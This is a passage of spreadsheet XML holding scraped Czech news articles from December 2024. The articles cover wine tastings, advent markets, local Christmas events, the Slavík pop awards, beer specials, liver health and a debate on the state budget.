zvaná naděje. Podle hasičů je tak namístě obezřetnost. Chvíle nepozornosti může způsobit pořádné neštěstí.</t>
  </si>
  <si>
    <t>20241201_46_3478535076_2b720e70c09c19ef8baa.html</t>
  </si>
  <si>
    <t>2b720e70c09c19ef8baa</t>
  </si>
  <si>
    <t>Liberec ochutnal nejlepší vína</t>
  </si>
  <si>
    <t>Liberec ochutnal nejlepší vína 01.12.2024 Královské košty - pultové degustace medailových vín KRÁLe VÍN ĆR 2024 - zavítaly v pátek do Liberce . Kongresový sál v hotelu Clarion Grandhotel Zlatý lev je velmi elegantní a krásně podtrhl kvalitu vín a jejich prezentace. I zde byla návštěva milovníků vín velmi hojná a reakce nadšené. K vynikajícím vínům patří vynikající občerstvení, o které se tradičně starají partneři KRÁLE VÍN - základem je skvělý kváskový chléb BREADWAY, výběr sýrů BRAZZALE MORAVIA , krémové sýry z KRÁL SÝRŮ, MADETA a OLMÍN, parené sýry LIPTOV, vynikající uzeniny STEINHAUSER a SCHNEIDER, skvělé paštiky PATÉ DU CHEF a výborné polotvrdé sýry LACRUM. Královské košty cestovali kolem celé ČR - zbývají už jen poslední dva! Tuto sobotu se uvidíme v Ústí nad Labem . https://www.kralvin.cz/kalendar-akci Galerie Další aktuality Děkujeme partnerům vinařského projektu KRÁL VÍN České republiky aa Chcete svůj účet na kralvin.cz? Neváhejte a zaregistrujte se. Pokud jste zapomněli heslo k Vašemu účtu, můžete si nastavit nové heslo. Zapomenuté heslo Zadejte e-mail, na který Vám zašleme potvrzení o změně hesla.: E-mail: SOUHLAS SE ZPRACOVÁNÍM DAT Aby se vám web dobře používal Pro co nejpohodlnější používání webu potřebujeme váš souhlas se zpracováním dat. Souhlas udělíte kliknutím na tlačítko "Povolit vše". Nastavení dat Technické a bezpečnostní Jsou nezbytné pro zajištění základních funkcí stránek a pro správný provoz webu. Z toho důvodu jsou povinné a nelze je vypnout. Funkční Tato data poskytují pokročilejší funkce, jako je zapamatování přihlašovacích údajů, jazykových preferencí, země nebo nákupního košíku. Díky tomu nemusíte při každé další návštěvě nastavovat své preference. Tato data neshromažďují informace, které by mohly identifikovat uživatele. Personalizované a reklamní Tato data mohou sloužit k zaznamenávání vašeho chování nebo preferencí, vyjádřených při návštěvě webu. Díky nim je možné zobrazovat vám obsah, který odpovídá vašim zájmům a relevantní reklamy na jiných stránkách. Tato data můžeme prostřednictvím našich stránek nastavit my nebo naši reklamní partneři. Jsou založeny na identifikaci vašeho prohlížeče a zařízení. Pokud tato data nepovolíte, zobrazovaná reklama nemusí odpovídat vašim zájmům. Nastavují souhlas s personalizovanou reklamou. Analytické Tato data nám umožňují počítat návštěvy a zdroje návštěvnosti, abychom mohli měřit a zlepšovat výkon našich stránek. Pomáhají nám zjistit, které stránky jsou nejoblíbenější a které nejméně, a zjistit, jak se návštěvníci na webu pohybují. To nám umožňuje zlepšovat funkce a prostředí našeho webu. Souhlas můžete odmítnout Autor: kralvin.cz &amp;amp; IMPnet</t>
  </si>
  <si>
    <t>20241201_47_3478497068_e96a264d380606e51b01.html</t>
  </si>
  <si>
    <t>e96a264d380606e51b01</t>
  </si>
  <si>
    <t>10. narozeniny Toulavé Pípy</t>
  </si>
  <si>
    <t>10. narozeniny Toulavé Pípy 50.0405397 15.780431200000066 Datum / čas Date(s) - 13.12.2024 - 15.12.2024 12:00 - 22:00 Místo konání U Toulavé pípy Kategorie Přijďte s námi oslavit desáté výročí Toulavé Pípy 🍺 Na co se můžete těšit: •samospády •jídlo •kvíz •soutěž v pití piva •merch •narážení našeho piva a jiné Novinky: Minipivovar Paličák Palačov El Ňiňo - vánoční pivo . Světlá patnáctka, spodně kvašená, připravená z bohaté směsi šesti druhů sladu, což ji dodává plnou a jemně sladovou chuť. on 08/12/2024 Minipivovar Křikloun Hodonín Wai-iti APA 13. Světlý ejlík se střední hořkostí a ovocno-květinovou chutí s fantasticky svěžím broskvovo-meruňkovým aromatem, který je postaven na novozélandském chmelu. on 08/12/2024 Minipivovar Novosad Harrachov Vánoční světlý speciál 14. on 08/12/2024 Pivovar Spojovna Praha Kunratický Vánočák - 18 strong ale. on 08/12/2024 Šumavský pivovar Vimperk</t>
  </si>
  <si>
    <t>20241201_48_3482648511_cae1920a7275f5710f33.html</t>
  </si>
  <si>
    <t>cae1920a7275f5710f33</t>
  </si>
  <si>
    <t>Podívejte se, kolik dáte za svařák nebo párek na Benešovském adventním trhu</t>
  </si>
  <si>
    <t>Podívejte se, kolik dáte za svařák nebo párek na Benešovském adventním trhu Vánoční trh byl spojený s odpoledním kulturním programem. Ten vyvrcholil inovovaným aktualizovaným videomapingem a nakonec i rozsvícením vánočního stromu. play_fill Volný čas Masarykovo náměstí se pro tu příležitosti zaplnilo tak, že se téměř nedalo projít. Benešovský adventní trh 1. prosince 2024. | Video: Zdeněk Kellner U stánků se tvořily dlouhé fronty. Když už se zákazníci dostali na řadu, zaplatili za dvě deci svařeného vína 55 korun. O desetikorunu levněji se daly pořídit dvě deci grogu. Benešovsko Benešovské adventní trhy se znovu otevřou 13. a 14. prosince. Autor: Zdeněk Kellner Autor Zdeněk Kellner</t>
  </si>
  <si>
    <t>5400</t>
  </si>
  <si>
    <t>20241201_49_3478481388_ff59b440d9b65dc7e1ab.html</t>
  </si>
  <si>
    <t>ff59b440d9b65dc7e1ab</t>
  </si>
  <si>
    <t>Smržovské kulturní a zábavné akce v prosinci</t>
  </si>
  <si>
    <t>Smržovské kulturní a zábavné akce v prosinci 01.12.2024 18:47:28 | Autor: Paulina Havlasová | Rubrika: Kultura | Obce: Smržovka Přinášíme vám přehled akcí kulturního střediska a dalších organizací a spolků ve Smržovce a okolí v prosinci 2024. Advent u ovečkového betléma - železná neděle Od 16.30 hodin na rozhraní ulic Občanská a Vřesová ve Střední Smržovce. Rozsvícení betlému a vánočního stromku, ochutnávka domácího cukroví, pokus o překonání loňského rekordu v délce vánočky. Rozsvícení vánočního stromu Od 18.30 hodin před Zámečkem. Součástí letošního rozsvícení vánočního stromečku bude opět vypouštění balónků s přáním Ježíškovi. Napsané přání si přineste s sebou. Balónek se světýlkem si budete moci zakoupit za 20 Kč. Chybět nebude něco dobrého k zakousnutí a teplého k zahřátí. Přijďte a zúčastněte se příjemného zahájení adventního času. Jambo, Keňo! Výstava fotografií Petra Morávka ve výstavní síni Zámečku, kterou zahájí vernisáž v pátek 6. prosince od 18 hodin. „Už od mládí mi fotografování a cestování přináší radost. Kdo mě zná, ví, že při této zálibě fotím nejraději přírodu, tak jak ji vidím a vnímám já. Fotografování mi dává smysl objevovat nové věci a tvořit něco trvalého. Kdyby nebylo dlouholetého přání mojí ženy vycestovat do Keni , nevznikly by moje fotografické úlovky, které jsme společně s kamarády prožili v této zemi. Když naši přátelé projevili zájem dozvědět se příběhy z cesty, přijal jsem výzvu uspořádat výstavu a podělit se o zážitky. Prostřednictvím fotografií mohu ukázat rozmanitou přírodu Afriky , divoká zvířata ve volné přírodě, východ slunce v savaně a hlavně něco, co na jiném místě světa nelze zažít. Každá fotografie má svůj příběh (říká moje žena). Přijďte si je tedy prohlédnout od 6. prosince do Zámečku. Těším si i na osobní setkání v pátek 6. prosince od 18 hodin, kdy se můžete dozvědět, jak každý snímek vznikal. Přeji krásný obohacující zážitek." Petr Morávek. Výstavu můžete zhlédnout během týdne od 8 hodin, v pondělí a středu do 16 hodin, v úterý a čtvrtek do 15 hodin, v pátek do 11.30 hodin (polední přestávka: po-pá 11.30-12.30 hodin) - před plánovanou návštěvou vám doporučujeme si telefonicky ověřit, zda jsme přítomny (tel.: 483 369 325, 727 806 195), o víkendu pouze v sobotu od 13 do 16 hodin. Ve dnech 18. prosince 2024-5. ledna 2025 bude budova Zámečku uzavřena z důvodu čerpání řádné dovolené. Advent u ovečkového betléma Od 16.30 hodin na rozhraní ulic Občanská a Vřesová ve Střední Smržovce. Sousedské setkání, staročeské kyselo. Veřejné zasedání ZM Od 16 hodin v Parkhotelu. Hospodský kvíz Od 18 hodin v Parkhotelu. 56 otázek, soutěžení, výhry a především zábava. Chcete zažít víc než jen běžný pokec u piva ? Hospodský kvíz nabízí všem skvělý zážitek na večer. Bude k tomu stačit tužka, papír a chuť postavit se nové výzvě. Každý týden nové otázky, každý týden odměna pro nejúspěšnější týmy. Co je potřeba udělat? Sestavit tým (1-8 hráčů), vymyslet pro něj originální název a přihlásit jej. Pak se už jen dostavit včas a nechat se provést večerem moderátorem. Startovné za jednoho hráče je 100 Kč. Registrace týmů na https://hospodskykviz.cz/hospody/parkhotel-smrzovka/rezervace. Informace naleznete na https://www.facebook.com/groups/kvizparkhotel. Těšíme se na Vánoce Od 17.30 hodin v kostele sv. Archanděla Michaela koncert dětského pěveckého sboru Smržováček. Rozezní se také varhany, na které zahraje Hans Lau. Dětský pěvecký sbor Smržováček vystoupí pod vedením Pavly Dvořákové, za hudebního doprovodu Romany Halamové a Petra Kučery. Dobrovolné vstupné bude věnováno na restaurátorskou rekonstrukci varhan. Pořádá Spolek Michael ve spolupráci s městem Smržovka a římskokatolickou farností. Více na www.kostel-smrzovka.webnode.cz. Vánoční pohoda Od 9.30 hodin v Zámečku a jeho okolí. Program: 9.30 hodin - zahájení, 10 hodin - vystoupení dětského pěveckého sboru Smržováček, 10.20-13 hodin - hraje Kompress, 11 hodin - O cukrářce Barborce a zatoulaném čertíkovi - pohádka v podání Divadla Úsměv, 12.30 hodin - vystoupení tanečního kroužku ZŠ Smržovka . Na co se můžete ještě těšit? Svícny na vánoční stůl a další dekorace Střední školy hospodářské a lesnické Frýdlant . Barvení svíček. Výrobu drobných dárečků. Zvonečkování - přineste na Vánoční pohodu libovolný (nejlépe vlastnoručně vyrobený) zvoneček, který půjde zavěsit na zábradlí. Stánky se zbožím rozmanitým a dobrotami. Muzeum místní historie ve vánočním hávu: Výstava s názvem Jambo, Keňo! - fotografie Petra Morávka. Advent u ovečkového betléma Od 16.30 hodin na rozhraní ulic Občanská a Vřesová ve Střední Smržovce. Vystoupí Rychnovské trio, něco na zub z naší nové udírny Hospodský kvíz - Pohádkový speciál Od 18 hodin v Parkhotelu. Advent u ovečkového betléma Od 16.30 hodin na rozhraní ulic Občanská a Vřesová ve Střední Smržovce. Rybí polévka, skauti přivezou betlémské světlo. Slavnostní mše svatá Od 9 hodin v kostele sv. Archanděla Michaela. Tři králové u ovečkového betléma Od 16.30 hodin na rozhraní ulic Občanská a Vřesová ve Střední Smržovce. Zhasneme betlém a vyprovodíme tři krále na jejich cestu. O žádném adventu nebude chybět: klasická nabídka nápojů pro zahřátí - svařené víno , Betlémáček - alko i nealko, grog, čaj, opékání buřtů, něco z udírny. Aktuální informace najdete na webových stránkách Spolku Malé Polsko : www.malepolsko-cz.webnode.cz, na https://facebook.com/malepolsko nebo telefonním čísle: 724 646 656. Více informací www.smrzovka.cz nebo 483 369 325. Sdílet s přáteli na facebooku Jambo, Keňo! - Petr Morávek | Vánoční pohoda | Advent u ovečkového betléma | Těšíme se na Vánoce Autor: Paulina Havlasová Autor person Paulina Havlasová</t>
  </si>
  <si>
    <t>1500</t>
  </si>
  <si>
    <t>20241201_5_3479567264_75538586244d8633380f.html</t>
  </si>
  <si>
    <t>75538586244d8633380f</t>
  </si>
  <si>
    <t>Český pop je naše teplíčko a smrádeček. Slavíci hrají s tím, co mají, tak se každý rok nedivte</t>
  </si>
  <si>
    <t>Český pop je naše teplíčko a smrádeček. Slavíci hrají s tím, co mají, tak se každý rok nedivte Slavíci. Jednou do roka otevřeme katalog českého popu, abychom zjistili, že všechno zůstává při starém. Kabát zase vyprodal haly, Marek Ztracený sbírá ceny, a mezi nimi pár nových jmen, která nejsou tak nová, jak se tváří. Český hudební rybník totiž funguje podle svého vlastního ekosystému – pár velkých kaprů, pár nových rybek a voda, která se nikdy příliš nerozbouří. Každý rok se po Slavících objeví vlna článků, glos a názorů, které tuhle anketu cupují na kusy. Padnou slova jako „reklamní přehlídka“, „estráda“, nebo „nastavovaná kaše průměrnosti“. A upřímně? A co jako? Český pop je totiž pořád stejný. Máme svůj zaběhnutý systém, který neprodukuje žádné výrazné inovace, žádné překvapivé zvraty. Slavíci tu nejsou proto, aby nám ukázali, co nového na scéně vzniká. Jsou tu proto, aby potvrdili status quo. Česká hudební scéna je malý, uzavřený rybník. Má své hvězdy, své producenty a svá pravidla. Pokud chcete uspět, musíte do těchto pravidel zapadnout. Angličtina? Smůla. Česká rádia už třicet let hrají výhradně česky zpívané skladby. Inovativní žánry? Mimo mainstream vás nikdo neuslyší. A pokud se náhodou dostanete na výsluní, je to díky úzké síti lidí, kteří tahají za nitky. Hledači talentů jako Martin Červinka nebo producenti velkých vydavatelství jako Universal music určují, kdo bude „objevem roku“ a kdo bude okupovat playlisty rádií. Slavíci jsou jen odrazem toho, jak tenhle systém funguje. Popularita se měří počtem hlasů, ne kvalitou. O tom, kdo bude na pódiu stát, rozhodují spíš marketingové strategie než hudební inovace. To, co posluchači slyší na rádiích, co vidí v televizních reklamách a na sociálních sítích, je přesně to, co pak hodnotí. A protože česká scéna nemá kapacitu na velkou diverzitu, slyší pořád dokola ty samé interprety, ty samé písně. A přesto – nebo možná právě proto – mají Slavíci své místo. Nejsou anketou, která by měla ukazovat kvalitu nebo směr, kterým se česká hudba ubírá. Jsou měřítkem popularity. A popularita je o emocích, sympatiích, o tom, jak vás vnímá masové publikum. Můžete mít nejoriginálnější písničku roku, ale pokud ji neslyší nikdo mimo vaši bublinu, Slavík na vás nečeká. Příkladem je český hiphop. Umělci jako Viktor Sheen nebo Calin mají obrovské publikum, vyprodávají koncerty bez podpory rádií a televizí, a přesto dlouho zůstávali na okraji anket, jako je Slavík. Proč? Protože fungují mimo tenhle zavedený systém. Nepotřebují rádia, neřeší mainstreamový marketing. Naopak, jejich autenticita a nezávislost jsou tím, co jejich fanoušky přitahuje. Vojta Dyk: Až vyhraju, tak přijdu Pak tu máme Vojtu Dyka , který má hlas, za který by spousta zpěváků vraždila. Ale zdá se, že hlas sám o sobě nestačí. Když letos propagoval svůj koncert v O2 aréně, spíš než na hudbu vsadil na šoubyznysový all-star tým. Herci, sportovci, herečky – všichni na Instagramu přísahali, že právě Vojtův koncert je „událost roku“, a přitom s jeho hudbou neměli absolutně nic společného. Tak nějak to připomínalo nábor do tábora: „Přijď, bude tam parta!“ Jasně, nakonec to vyšlo a lístky se prodaly, ale otázka zní: Když máš fanoušky, nepotřebuješ snad k propagaci kámoše ze šoubyznysu, kteří ani neví, jak se jmenuje tvůj poslední hit, nebo jestli vůbec nějaký máš? A pak přišla jeho děkovná řeč na Slavíkovi. „Příště přijdu, až vyhraju,“ prohlásil. Ironie? Možná. Ale většina diváků slyšela jen hořkou výmluvu. Vojta Dyk je fenomenální zpěvák, ale Slavík není o tom, kdo má nejlepší hlas. Je o tom, kolik lidí vás opravdu chce poslouchat – a hlavně vidět. A jestli k zaplnění haly potřebujete partu influencerů, co vás přijdou podpořit, protože „jsme kámoši“, možná je čas zapracovat na hudbě, která si to publikum najde sama. Kabát: To samé, ale jinak Kabát je každoroční stálice, která vzbuzuje stejné emoce: „To zase vyhráli?“ Ano, zase. Ale kdo jiný? Kabát nehraje na inovace, hraje na jistotu. A ta jistota má podobu plných arén, obřích turné a publika, které je ochotné zpívat refrény v sudech piva (doslova). Že nejsou trendy? To je jim jedno. Kabát si jede své – a pořád jim to vychází. Marek Ztracený : Kýč? Ano, prosím! Marek Ztracený je neohrožený král českého popu. Čtyři roky zlatý Slavík a letos i bez koncertní šňůry. Proč? Protože Marek přesně ví, co jeho fanoušci chtějí. Jednoduché texty, srozumitelné emoce, a když už, tak vánoční klip s Ester Ledeckou . Hudební kýč? Možná. Ale tohle je přesně ten kýč, který Češi milují. A víte co? Má pravdu. Marek nezkouší být něčím, co není. Je to šumavský hitmaker, který ví, jak naplnit Eden a prodávat haly rychleji než rohlíky v akci. Kdysi byli Mirai všude – v rádiích, na festivalech, ve vašem playlistu i v hlavě, aniž byste to chtěli. Jenže letos se zdá, že se místo na vrcholu vezou na skluzavce dolů, a ne pomalu. Jejich písničky jsou tak zaměnitelné, že není jasné, jestli hrají nový hit, nebo omylem pustili demo z roku 2018. A když už se o frontmanovi Mirai Navrátilovi píše, není to kvůli hudbě, ale kvůli bulvárním historkám, které kapele rozhodně nepřidávají na kreditu. Ewa Farna : Fotka s Sheeranem nestačí Ewa Farna je stálicí, která si své místo na scéně vybojovala tvrdou prací. Letos opět získala absolutního zlatého Slavíka, ale co na tom? Má fotku s Edem Sheeranem . Její přístup je jasný – pracovat na sobě, zkoušet nové věci a posouvat se dál. A hlavně: dokázat to nejen u nás, ale i v Polsku . Ewa ukazuje, že i v našem malém rybníčku můžete mít ambice, které sahají za hranice. Objevy, které už všichni známe Objev roku? Spíš návrat známých tváří. Sofian Medjmedj, Pam Rabbit… Nic proti nim, jsou talentovaní, ale objev? Ne tak docela. Je to jen další ukázka, jak česká hudební scéna funguje. Když se dostanete do správných rukou, máte jistotu, že za rok budete na všech správných místech. Slavík není o překvapeních, je o systému. Teplo a smrádeček Realita je taková, že současný český pop není na světové úrovni konkurenceschopný. Čeští zpěváci jsou rádi, když se jim jednou za rok podaří vyprodat jeden nebo dva stadiony. Celý hudební byznys tady ovládají prakticky jedno až dvě vydavatelství. Tvrdíme, že chceme být světoví, ale realita je jiná – nejsme ani lokální hudební scéna, kde by si kdokoli dokázal skutečně výrazně prosadit svou vlastní cestu. V českém hudebním světě si škrtnou jen ti, kteří zapadnou do úzce nastavených pravidel. Slavíci na tomhle světě nestaví, oni ho jen zrcadlí. Co jiného taky čekat? Slavík není o umění, je to měřák popularity. A popularita je jednoduchá. Vítězí ti, které lidé znají, zpívají si jejich písničky u řízků a sledují je na Instagramu. Žádné překvapení, žádná revoluce. Prostě Slavík. Je to málo? Možná. Ale pojďme být upřímní – kdyby Nova v sobotu večer naservírovala show, která by vypadala jako produkce Grammy, byli bychom překvapení, ale možná taky trochu zmatení. Protože tohle není Amerika, tohle je Česko. Země, kde Kabát vládne 30 let a Ztracený prodává Eden jako rohlíky v akci. Tady se nehraje na velkolepost, tady se hraje na jistotu. A možná právě proto Slavíci fungují. Jsou to Vánoce českého popu. Tradice. Víte, co čekat, a to vás uklidňuje. A teď ten plot twist. Když se podíváte za hranice mainstreamu, objevíte svět, kde se věci hýbou. Hiphopová scéna s Calinem, Viktorem Sheenem nebo Yzomandiasem jede na úplně jiném levelu. Vyprodávají koncerty, ovládají Spotify, a přitom nepotřebují žádné televizní estrády. Jsou moderní, jsou cool a hlavně – jsou autentický. Nepotřebují Slavíka, protože mají své fanoušky, kteří na ně nedají dopustit. Takže příště, až budete brblat, že Slavíci jsou zase jenom ta samá stará písnička, zkuste to vzít s nadhledem. Nejsou dokonalí, ale jsou naši. A kdo chce víc, má vždycky Spotify, nebo lístek na Calina. Svět nezměníte přes noc, ale pořád máte možnost si k tomu pustit přesně to, co vás baví. A o tom to celé je. Fotogalerie 10 fotografií O světovost se postarala zpěvačka LP, která předala zlavního slavíka Marku... Český slavík 2024 Mirai Navrátil , Eva Burešová Český pop, To je teplíčko, smrádeček a nekonečné déjà vu. Autor: Petr Konečný Autor Petr Konečný</t>
  </si>
  <si>
    <t>88570</t>
  </si>
  <si>
    <t>112460</t>
  </si>
  <si>
    <t>20241201_50_3478486834_b7cd374b6c5ac8bda5c0.html</t>
  </si>
  <si>
    <t>b7cd374b6c5ac8bda5c0</t>
  </si>
  <si>
    <t>Vánoční trhy Praha 2024</t>
  </si>
  <si>
    <t>Vánoční trhy Praha 2024 Je konec roku, a tak v Praze začali vánoční trhy tyto trhy jsou lákadlem pro turisty, místní obyvatelstvo sedí doma a vychází jenom do zaměstnání nebo obchodu, děti vyrážejí do školy, na venkově je situace zcela jiná. Jistě, vánoční trhy jsou neodmyslitelnou součástí konce roku v Praze a mnoha dalších městech. Jejich kouzlo spočívá v jedinečné atmosféře, vůni svařeného vína a trdelníku, a samozřejmě v široké nabídce dárků a vánočních dekorací. Je to období, kdy se lidé setkávají, užívají si společně strávený čas a nechají se unášet svátečním duchem. Oproti tomu život na venkově často nabízí jiný pohled na vánoční období. Zatímco ve městech převládá ruch a shon, na venkově se často klade větší důraz na klid, rodinu a tradiční zvyky. Lidé zde mají více času věnovat se přípravě na Vánoce, zdají se být více v souladu s přírodou a rytmem ročních období. Je však důležité si uvědomit, že tento obraz je zjednodušený. Život na venkově se v posledních letech také mění a mnoho venkovských obyvatel navštěvuje vánoční trhy nebo se účastní podobných akcí ve svých obcích. Také ve městech se stále najdou lidé, kteří si váží tradičních hodnot a snaží se prožít Vánoce co nejvíce autenticky. Vánoční trhy. Lákadlo pro turisty, místo setkávání a zábavy. Město. Rychlé tempo života, zaměření na práci a konzumaci. Venkov. Klidnější tempo, důraz na rodinu a tradice. Změny. Moderní život zasahuje i venkov, tradice se proměňují. Zvířata neznají oslavy a svátky, protože jejich život je jednoduchý, lidí rádi něco slaví, aby zapomněli na svoje problémy. To je zajímavý pohled na rozdíl mezi lidským a zvířecím vnímáním času a oslav. Je pravda, že zvířata nemají stejný koncept času jako my a nevnímají události jako začátky a konce, spíše se řídí cykly přírody a instinkty. Máte pravdu, že lidé často využívají oslav jako způsob, jak se odreagovat od každodenních starostí a problémů. Sváteční atmosféra, setkávání s blízkými a různé rituály nám pomáhají vytvořit si příjemné vzpomínky a posílit sociální vazby. Oslavy mají také hlubší kořeny v lidské historii a kultuře. Mnohé z nich jsou spojeny s náboženstvím, ročními obdobími, významnými událostmi nebo životními milníky. Slouží jako připomínka našich hodnot, tradic a identity. Related</t>
  </si>
  <si>
    <t>19</t>
  </si>
  <si>
    <t>20241201_51_3478461710_b4671b7ba34d061bc3ae.html</t>
  </si>
  <si>
    <t>b4671b7ba34d061bc3ae</t>
  </si>
  <si>
    <t>Dva vánoční speciály od Bernarda</t>
  </si>
  <si>
    <t>Dva vánoční speciály od Bernarda Vánoce ve sklenici Prvním ze speciálů je Adventní speciál Bernard, polotmavý ležák, který je se svojí podmanivou vůní a chutí ideální volbou v předvánočním čase v útulných hospodách a restauracích. „Polotmavou třináctku s hustou pěnou jsme uvařili z výběru kvalitních sladů – českého, bavorského, karamelového a čokoládového,“ popisuje Josef Vávra, vrchní sládek a generální ředitel pivovaru. Adventní speciál má příjemnou vůni s tóny karamelu a sladu, harmonickou chuť a vyváženou hořkost, kterou zajišťuje kombinace několika druhů chmele. Obsah alkoholu činí 5,6 %, hořkost dosahuje 32 jednotek hořkosti (IBU). K dostání je výhradně čepovaný v hospodách a restauracích. Ležák s chmelem z Vysočiny: chmelová jedinečnost „Koření“ pro druhou sváteční novinku, Ležák s chmelem z Vysočiny, narostlo na loni založené chmelnici v nadmořské výšce 560 metrů. Na svahu za městem pivovar poprvé vypěstoval a sklidil úrodu ze 144 rostlin šesti odrůd chmele. „ Chmel z naší chmelnice je plnohodnotný, aromatický a pivo z něj lidem chutná. Navazuje tak na tradici, kdy jsem chmel do speciálu pěstoval několik let jen doma na zahradě, “ říká Josef Vávra. Ležák s chmelem z Vysočiny je svěží jedenáctka s obsahem alkoholu 4,7 % a hořkostí 38 IBU. Speciály ve vybraných prodejnách a restauracích Oba speciály jsou limitovanou záležitostí, k ochutnání budou od prvního adventního týdne v podnicích s čepovaným pivem Bernard, Ležák s chmelem z Vysočiny bude dostupný i v lahvích ve značkových prodejnách pivovaru. Zdroj: Tisková zpráva Autor: Autor: | České nápoje || České nápoje</t>
  </si>
  <si>
    <t>244</t>
  </si>
  <si>
    <t>20241201_52_3478478691_a91c90348bce70f145af.html</t>
  </si>
  <si>
    <t>a91c90348bce70f145af</t>
  </si>
  <si>
    <t>Naprosto příšerné potraviny pro vaše játra</t>
  </si>
  <si>
    <t>Naprosto příšerné potraviny pro vaše játra. Autor: Shutterstock 2 Játra jsou klíčovým orgánem lidského těla, která hrají zásadní roli ve detoxikaci, metabolismu a uložení živin. Vzhledem k tomu, jak jsou játra důležitá pro naše zdraví, je zásadní starat se o ně a vyhýbat se některým potravinám, které mohou mít na tento orgán nepříznivý vliv. Tento článek se zaměřuje na potraviny, které jsou pro játra nejškodlivější, a poskytuje náhled na to, jak játra fungují a proč je třeba je chránit. Jak fungují játra? Játra jsou jedním z největších a nejdůležitějších orgánů v lidském těle. Hlavní funkcí jater je filtrovat krev, která prochází zažívacím traktem, než ji nechá běžet do zbytku těla. Játra také detoxikují chemikálie a metabolizují léky, čímž je tělo připravuje na odstranění. Kromě toho játra produkují důležité krevní bílkoviny, pomáhají regulovat hladiny cukru v krvi, ukládají energii ve formě glykogenu a brání tělo před infekcemi. Proč musíme chránit játra? Vzhledem k mnoha funkcím, které játra plní, je důležité je chránit před poškozením. Většina toxinů, které přijímáme, je filtrována právě v játrech. Dlouhodobá konzumace škodlivých látek může vést k závažným jaterním problémům, jako je cirhóza, hepatitida nebo rakovina jater. Naprosto příšerné potraviny pro játra Alkohol Alkohol je jedním z největších nepřátel jater. Játra se snaží alkohol odbourat, ale při nadměrné konzumaci může dojít k jejich zánětu či k poškození buněk. To může vyústit v alkoholovou steatohepatitidu nebo cirhózu jater, což jsou stavy, jež mohou mít smrtelné následky. Cukry a sladkosti Nadměrná konzumace cukrů a rafinovaných uhlohydrátů může vést k tvorbě tuku v játrech, což je základní charakteristika nealkoholové tukové jaterní choroby (NAFLD). Sladké nápoje, pečivo a sladkosti by měly být konzumovány s opatrností. Smažená jídla Smažená jídla jsou zpravidla bohatá na nasycené tuky a kalorie, což může přispívat ke vzniku jaterních problémů, včetně ztukovatění jater. Živočišné tuky v těchto potravinách se těžko metabolizují a mohou zvyšovat hladinu tuků v krvi. Přebytek soli Nadbytek soli v potravě může způsobit zadržování tekutin a snížit schopnost jater efektivně fungovat. Zpracované potraviny, jako jsou polévky v konzervách, instantní nudlové pokrmy a různé snacky, často obsahují vysoký obsah soli. Červené maso Červené maso může být pro játra problematické především kvůli vysokému obsahu nasycených tuků a cholesterolu. Nadměrná konzumace může přispět k tvorbě tuků v játrech, což má za následek poškození jater. Polotovary a vysoce zpracované potraviny Polotovary a vysoce zpracované potraviny bývají plné nezdravých tuků, cukrů, soli a konzervačních látek. Častá konzumace těchto potravin výrazně zatěžuje játra a může vést k zánětům a dalším komplikacím. Jak chránit játra? I když se tento článek zaměřuje na potraviny, kterým je radno se vyhnout, je také důležité zmínit některé prospěšné praktiky. Konzumace čerstvých zeleninových salátů, ovoce a celozrnných výrobků může vaši játra podpořit v jejich funkci. Pití dostatečného množství vody rovněž pomáhá udržovat játra v dobrém stavu. Pravidelná fyzická aktivita navíc pomáhá snižovat tuky a udržovat optimální hmotnost, což je pro játra prospěšné. Zdravotní funkce jater ovlivňuje celkovou kondici organismu, a proto je důležité být si vědom potravin, které mohou naše játra poškodit. Minimalizujte konzumaci alkoholu , sladkostí, smažených a vysoce zpracovaných potravin a zaměřte se na zdravý životní styl. Tím nejen chráníte jeden z vašich nejdůležitějších orgánů, ale také přispíváte k dlouhodobému zdraví celého těla. Zdroj: www.pmc.ncbi.nlm.nih.gov/articles/PMC8073814/, www.sciencedirect.com/science/article/abs/pii/S0098299707000842?via%3Dihub Autor: Lea Novotná Autor person Lea Novotná</t>
  </si>
  <si>
    <t>20241201_53_3478436385_0dba2fee856e5ee885e5.html</t>
  </si>
  <si>
    <t>0dba2fee856e5ee885e5</t>
  </si>
  <si>
    <t>Zvýšit daň z nemovitosti, razantně! Navrhuje poradkyně Fialovy vlády</t>
  </si>
  <si>
    <t>Zvýšit daň z nemovitosti, razantně! Navrhuje poradkyně Fialovy vlády „Vláda rezignovala na hospodářský růst a plošně zvýšila daně. Snížení schodku je přesto daleko nižší, než kolik nově vybrala na daních,“ uvedl místopředseda rozpočtového výboru Poslanecké sněmovny Jan Hrnčíř. Řeč v druhé části Otázek Václava Moravce byla o konsolidaci veřejného rozpočtu. Došlo i na daně z nemovitostí. „Máme podprůměrné výběry majetkových a spotřebních daní,“ řekla členka Národní ekonomické rady vlády a ekonomka Helena Horská. Podle ní by se tyto daně měly zvednout na západní úroveň. Ve druhé části Otázek Václava Moravce České televize proti sobě usedli ekonomka a členka Národní ekonomické rady vlády Helena Horská a místopředseda rozpočtového výboru Poslanecké sněmovny a poslanec za SPD Jan Hrnčíř. Prezident Petr Pavel avizoval, že je možné, že vládě nepodepíše její návrh rozpočtu pro rok 2025, protože v něm jsou nejasnosti. Jak by se Helena Horská zachovala v roli prezidenta? „Určitě bych chtěla v roli prezidenta diskutovat s ministrem financí, chtěla bych slyšet, že bude naplňovat všechna zlatá pravidla pro rozpočet, to bych od něj chtěla rozhodně slyšet,“ zlaté pravidlo funguje jak pro státní rozpočet, tak i pro rozpočet jednotlivých domácností. A znamená pracovat s vyrovnaným rozpočtem, kde jsou rozložené peníze na potřeby, na investice, ale i na nutné rezervy. Helena Horská poznamenala, že rozpočet státu je klíčový zákon každé vlády. „Je to klíčový zákon této vlády, rozpočet jako takový je klíčový i jako nástroj pro to, co chce vláda prosadit v dalším roce,“ řekla. Nelíbí se jí, že se rozpočet projednává tak pozdě. „Posouvají projednávání v čase. Budeme na hraně zákona, na konci roku, a to není dobré, protože pak není místo pro diskusi. Zákon by měl být projednáván prozřetelně. Je smutné, že se klíčový zákon projednává v poslaneckém chaosu při jednání, kdy se jednotlivé strany opozice a koalice nedokážou prakticky na ničem shodnout,“ poznamenala Horská. Mohlo by přijít i rozpočtové provizorium, tedy stav, kdy by vláda nestihla prosadit návrh rozpočtu nebo by jej prezident vetoval? „Rozpočtové provizorium není nikdy dobře. Kdyby bylo jen měsíc, tak by se to dalo zvládnout,“ zkonstatoval Hrnčíř a dodal, kde jsou v rozpočtu vážné chyby. „Stanjura sestavuje rozpočet tak, jak se to nemá dělat. Má nadhodnocené příjmy, chybějí tam peníze na lékařský personál, na nepedagogické pracovníky,“ vypočítával 